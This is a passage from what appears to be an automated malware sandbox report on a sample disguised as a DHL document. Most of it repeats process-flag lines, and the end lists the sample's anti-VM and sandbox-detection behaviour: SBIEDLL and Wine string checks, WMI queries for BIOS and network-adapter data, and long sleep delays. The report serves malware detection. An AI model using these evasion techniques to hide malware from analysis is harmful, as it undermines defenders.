                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000000.00000002.276321285.0000000002557000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.275750377.000000000245A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Dhl Document 7348255141.exe PID: 4392, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: Dhl Document 7348255141.exe, 00000000.00000002.276321285.0000000002557000.00000004.00000001.sdmp, Dhl Document 7348255141.exe, 00000000.00000002.275750377.000000000245A000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: Dhl Document 7348255141.exe, 00000000.00000002.276321285.0000000002557000.00000004.00000001.sdmp, Dhl Document 7348255141.exe, 00000000.00000002.275750377.000000000245A000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exe TID: 5428Thread sleep time: -36406s >= -30000s
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exe TID: 404Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6280Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5213
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3528
